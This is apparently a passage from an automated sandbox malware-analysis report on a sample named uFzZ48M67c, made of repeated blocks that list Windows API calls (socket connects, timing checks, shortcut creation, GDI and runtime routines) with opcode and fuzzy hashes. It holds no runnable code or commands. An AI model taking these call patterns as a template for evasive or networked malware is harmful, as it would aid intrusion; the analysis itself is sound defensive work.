                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                          • String ID:
                                          • API String ID: 3087257052-0
                                          • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                          • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                          • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                          • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                          APIs
                                            • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                          • socket.WSOCK32(00000002,00000001,00000006), ref: 004653FE
                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                          • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                          • closesocket.WSOCK32(00000000), ref: 00465481
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                          • String ID:
                                          • API String ID: 245547762-0
                                          • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                          • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                          • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                          • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                          APIs
                                          • DeleteObject.GDI32(00000000), ref: 004471D8
                                          • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                          • SelectObject.GDI32(?,00000000), ref: 00447228
                                          • BeginPath.GDI32(?), ref: 0044723D
                                          • SelectObject.GDI32(?,00000000), ref: 00447266
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Object$Select$BeginCreateDeletePath
                                          • String ID:
                                          • API String ID: 2338827641-0
                                          • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                          • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                          • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                          • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                          APIs
                                          • Sleep.KERNEL32(00000000), ref: 00434598
                                          • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                          • Sleep.KERNEL32(00000000), ref: 004345D4
                                          • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: CounterPerformanceQuerySleep
                                          • String ID:
                                          • API String ID: 2875609808-0
                                          • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                          • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                          • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                          • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                          • MessageBeep.USER32(00000000), ref: 00460C46
                                          • KillTimer.USER32(?,0000040A), ref: 00460C68
                                          • EndDialog.USER32(?,00000001), ref: 00460C83
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                          • String ID:
                                          • API String ID: 3741023627-0
                                          • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                          • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                          • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                          • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Destroy$DeleteObjectWindow$Icon
                                          • String ID:
                                          • API String ID: 4023252218-0
                                          • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                          • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                          • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                          • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                          APIs
                                          • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                          • DeleteObject.GDI32(?), ref: 00455736
                                          • DeleteObject.GDI32(?), ref: 00455744
                                          • DestroyIcon.USER32(?), ref: 00455752
                                          • DestroyWindow.USER32(?), ref: 00455760
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: DeleteDestroyObject$IconMessageSendWindow
                                          • String ID:
                                          • API String ID: 1489400265-0
                                          • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                          • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                          • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                          • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                          APIs
                                            • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                          • DestroyWindow.USER32(?), ref: 00455728
                                          • DeleteObject.GDI32(?), ref: 00455736
                                          • DeleteObject.GDI32(?), ref: 00455744
                                          • DestroyIcon.USER32(?), ref: 00455752
                                          • DestroyWindow.USER32(?), ref: 00455760
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                          • String ID:
                                          • API String ID: 1042038666-0
                                          • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                          • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                          • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                          • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                          • String ID:
                                          • API String ID: 2625713937-0
                                          • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                          • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                          • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                          • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                          APIs
                                          • __getptd.LIBCMT ref: 0041780F
                                            • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                            • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                          • __getptd.LIBCMT ref: 00417826
                                          • __amsg_exit.LIBCMT ref: 00417834
                                          • __lock.LIBCMT ref: 00417844
                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                          • String ID:
                                          • API String ID: 938513278-0
                                          • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                          • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                          • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                          • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                          APIs
                                            • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                          • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                          • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                          • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                          • ExitThread.KERNEL32 ref: 00413D4E
                                          • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                          • __freefls@4.LIBCMT ref: 00413D74
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                          • String ID:
                                          • API String ID: 2403457894-0
                                          • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                          • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                          • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                          • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                          APIs
                                            • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                          • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                          • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                          • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                          • ExitThread.KERNEL32 ref: 004151ED
                                          • __freefls@4.LIBCMT ref: 00415209
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                          • String ID:
                                          • API String ID: 4247068974-0
                                          • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                          • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                          • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                          • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 5$8$^
                                          • API String ID: 0-3622883839
                                          • Opcode ID: 5b0bf54134f80cff9ca6ce4a8dff4b23300e7e002ba4f74be1d0103a91d53083
                                          • Instruction ID: 6ee989b57c56cc683e8081b45a60e8d88641feefa2b309a8211b066407c3f2e5
                                          • Opcode Fuzzy Hash: 5b0bf54134f80cff9ca6ce4a8dff4b23300e7e002ba4f74be1d0103a91d53083
                                          • Instruction Fuzzy Hash: 82F1B4B1D00649AACB24CFA9C940AEEFBF4EF84300F14856FE455E7351E3B89A45CB56
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: )$U$\
                                          • API String ID: 0-3705770531
                                          • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                          • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                          • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                          • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                          APIs
                                            • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                          • CoInitialize.OLE32(00000000), ref: 0046E505
                                          • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                          • CoUninitialize.OLE32 ref: 0046E53D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                          • String ID: .lnk
                                          • API String ID: 886957087-24824748
                                          • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                          • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                          • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                          • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                          Strings
                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
